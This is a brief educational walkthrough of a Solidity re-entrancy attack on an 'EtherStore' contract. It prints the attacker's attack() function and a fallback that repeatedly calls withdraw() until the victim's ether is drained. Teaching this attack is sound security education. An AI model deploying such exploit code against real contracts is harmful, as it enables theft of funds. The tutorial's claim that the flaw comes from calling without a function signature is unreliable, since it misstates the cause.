Re-Entrancy Attack
Aim: To learn re-entrancy attack
Source: https://solidity-by-example.org/hacks/re-entrancy/
Advisor: Grandzero
EtherStore contract
Deploy the EtherStore contract and deposits the ether from 3 different accounts.
0x5c6B0f7Bf3E7ce046039Bd8FABdfD3f9F5021678 deposits 10 ether
0x03C6FcED478cBbC9a4FAB34eF9f40767739D1Ff7 deposits 10 ether
0x1aE0EA34a72D944a8C7603FfB3eC30a6669E454C deposits 10 ether
Attack contract
We deploy Attack contract with EtherStore contract address.
Attack time!
function attack() external payable
{
require(msg.value >= 1 ether);
etherStore.deposit{value: 1 ether}();
etherStore.withdraw();
}
We need 1 ether for attacking.
When you click the attack button:
1- require(msg.value >= 1 ether); this is require controlling whether you sent the 1 ether
2- etherStore.deposit{value: 1 ether}(); this deposits 1 ether to the EtherStore contract
3-etherStore.withdraw(); this call the withdraw function
4-(bool sent, ) = msg.sender.call{value: bal}(“”);
This function works but it has fault.
You should use the call function with signature of the called function.
There is no signature.
1 ether sents to new contract but system falls to the fallback function.
5-System calls the fallback function
fallback() external payable
{
if (address(etherStore).balance >= 1 ether)
{
etherStore.withdraw();
} }
6- Again, fallback function directs us to the withdraw function.
7–1 ether sents to new contract but system falls to the fallback function.
…..
31- Attack code collects all the ethers from first contract.
Do you want to see in this process in debug?
Dr. Engin YILMAZ